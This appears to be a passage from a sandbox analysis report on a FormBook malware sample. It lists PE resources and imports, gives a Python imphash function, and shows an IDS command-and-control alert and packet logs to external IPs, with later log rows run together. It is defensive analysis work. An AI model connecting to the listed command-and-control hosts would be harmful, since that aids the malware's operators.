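On the constructed image the .rsrc row comes out with an entropy just under 8.0 and a zlib ratio slightly above 1.0, the same profile as the report's .rsrc and the 0x56e77-byte RT_RCDATA resource listed below it at 1.0003.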
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xc9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xca148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xca6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc410 | 0x56e77 | data | | | 1.000325880227779
RT_GROUP_ICON | 0x123288 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x123300 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x123314 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1233f0 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
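The "Import Hash" in the static information above is derived from exactly this table: the pefile-style imphash is the MD5 of "dll.function" pairs, lower-cased, DLL extension stripped, joined with commas in import-descriptor order. Its value for pivoting is that it identifies the build of the runtime or packer rather than the sample, so two files that share it were linked from the same import set. The function below is an added illustration of that algorithm, not the report's or pefile's own code. Imports by ordinal are the edge case: pefile maps ordinals for ws2_32/wsock32 and oleaut32 back to names through fixed tables so that the hash does not change with how the linker emitted the import; only a handful of those ordinals are reproduced here (an assumption the reader extends), and anything else falls back to "ordN". The sample input is a constructed subset of the first two rows of the table.

```python
import hashlib

# Ordinal-to-name tables for the DLLs pefile normalises.  Only a few entries
# are included (assumption: extend as needed); unknown ordinals become "ordN".
WINSOCK_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 9: "htons",
                    10: "ioctlsocket", 11: "inet_addr", 13: "listen", 15: "ntohs",
                    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
                    21: "setsockopt", 23: "socket", 52: "gethostbyname", 57: "gethostname",
                    111: "wsagetlasterror", 115: "wsastartup", 116: "wsacleanup",
                    151: "__wsafdisset"}
ORDINAL_NAMES = {
    "ws2_32": WINSOCK_ORDINALS,
    "wsock32": WINSOCK_ORDINALS,          # same ordinal layout as ws2_32
    "oleaut32": {2: "sysallocstring", 6: "sysfreestring", 7: "sysstringlen",
                 8: "variantinit", 9: "variantclear", 10: "variantcopy"},
}


def _normalise_dll(dll: str) -> str:
    """Lower-case the module name and drop a .dll/.ocx/.sys extension."""
    dll = dll.lower()
    for ext in (".ocx", ".sys", ".dll"):
        if dll.endswith(ext):
            return dll[:-len(ext)]
    return dll


def imphash(imports) -> str:
    """imports: iterable of (dll_name, [function name or int ordinal, ...]) in
    import-descriptor order.  Returns the 32-hex-character MD5 imphash."""
    parts = []
    for dll, funcs in imports:
        base = _normalise_dll(dll)
        for func in funcs:
            if isinstance(func, int):                      # ordinal-only import
                name = ORDINAL_NAMES.get(base, {}).get(func, f"ord{func}")
            else:
                name = func.lower()
            parts.append(f"{base}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


# Constructed subset of the import table above (first two DLLs), in listed order.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", ["__WSAFDIsSet", "recv", "send", "setsockopt", "ntohs"]),
    ("VERSION.dll", ["GetFileVersionInfoW", "VerQueryValueW", "GetFileVersionInfoSizeW"]),
]
# The same import set as a linker would emit it when importing WSOCK32 by ordinal;
# after normalisation it must hash identically.
SAMPLE_IMPORTS_BY_ORDINAL = [
    ("wsock32.dll", [151, 16, 19, 21, 15]),
    ("VERSION.dll", ["GetFileVersionInfoW", "VerQueryValueW", "GetFileVersionInfoSizeW"]),
]

if __name__ == "__main__":
    print(imphash(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS_BY_ORDINAL))
```

Feeding the complete table above, row by row and in the order printed, reproduces the report's Import Hash only if that order is the binary's import-descriptor order and no import is by an ordinal missing from the lookup table; when the values differ, compare against pefile.PE(path).get_imphash() on the file itself rather than trusting the listing.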
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-24T08:35:06.513368+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.7 | 49849 | 104.18.73.116 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 24, 2024 08:34:47.834650993 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:47.954336882 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:47.954459906 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:47.971215963 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:48.092149973 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393601894 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393649101 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393673897 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393692970 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393698931 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393718958 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393724918 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393735886 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393742085 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.393753052 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.394040108 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.513791084 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.513874054 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.514009953 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.517802954 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.564449072 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.604008913 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.604166985 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.604273081 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.608208895 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.608325958 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.608412981 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.616616964 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.616729975 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.616805077 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.625015020 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.625164032 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.625241995 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.633524895 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.633565903 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.633637905 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.641858101 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.641944885 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.642029047 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.650465012 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.650502920 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.650584936 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.658752918 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.658829927 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.658958912 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.667279959 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.667310953 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:34:49.667373896 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.676779032 CET | 49808 | 80 | 192.168.2.7 | 90.156.201.74
Nov 24, 2024 08:34:49.796329975 CET | 80 | 49808 | 90.156.201.74 | 192.168.2.7
Nov 24, 2024 08:35:05.114991903 CET | 49849 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:05.234565973 CET | 80 | 49849 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:05.234780073 CET | 49849 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:05.251280069 CET | 49849 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:05.370790005 CET | 80 | 49849 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:06.513047934 CET | 80 | 49849 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:06.513269901 CET | 80 | 49849 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:06.513367891 CET | 49849 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:06.770426035 CET | 49849 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:07.792604923 CET | 49855 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:07.912339926 CET | 80 | 49855 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:07.912452936 CET | 49855 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:07.952327967 CET | 49855 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:08.071995020 CET | 80 | 49855 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:09.187107086 CET | 80 | 49855 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:09.187813044 CET | 80 | 49855 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:09.187927008 CET | 49855 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:09.461731911 CET | 49855 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:10.481338978 CET | 49862 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:10.601061106 CET | 80 | 49862 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:10.601444960 CET | 49862 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:10.617640018 CET | 49862 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:10.737313986 CET | 80 | 49862 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:10.737365007 CET | 80 | 49862 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:11.828428984 CET | 80 | 49862 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:11.828517914 CET | 80 | 49862 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:11.828677893 CET | 49862 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:12.134836912 CET | 49862 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:13.473037958 CET | 49868 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:13.592691898 CET | 80 | 49868 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:13.592839003 CET | 49868 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:13.676418066 CET | 49868 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:13.798161983 CET | 80 | 49868 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:14.772567987 CET | 80 | 49868 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:14.773724079 CET | 80 | 49868 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:14.773910999 CET | 49868 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:14.775950909 CET | 49868 | 80 | 192.168.2.7 | 104.18.73.116
Nov 24, 2024 08:35:14.895471096 CET | 80 | 49868 | 104.18.73.116 | 192.168.2.7
Nov 24, 2024 08:35:20.596491098 CET | 49884 | 80 | 192.168.2.7 | 66.29.148.78
Nov 24, 2024 08:35:20.716109991 CET | 80 | 49884 | 66.29.148.78 | 192.168.2.7
Nov 24, 2024 08:35:20.716312885 CET | 49884 | 80 | 192.168.2.7 | 66.29.148.78
Nov 24, 2024 08:35:20.736753941 CET | 49884 | 80 | 192.168.2.7 | 66.29.148.78
                                                              Nov 24, 2024 08:35:20.856322050 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037144899 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037187099 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037242889 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037468910 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:22.243815899 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.262785912 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.382385015 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:23.382519960 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.396985054 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.516719103 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603938103 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603969097 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603985071 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.604089975 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:24.604161978 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:24.899399042 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:25.918134928 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.037683964 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:26.037818909 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.053543091 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.173074007 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:26.173192978 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304543972 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304569960 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304647923 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:27.304661036 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304702997 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:27.555829048 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.574465036 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.694434881 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:28.694741964 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.704195976 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.823807955 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960447073 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960505962 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960515976 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960524082 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960633039 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:29.965162992 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:30.084559917 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:36.252739906 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.372203112 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:36.372312069 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.389164925 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.508656979 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:37.901230097 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:38.068684101 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:38.918474913 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.037916899 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:39.038177967 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.053653002 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.173260927 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:40.513411999 CET8049923207.148.38.19192.168.2.7
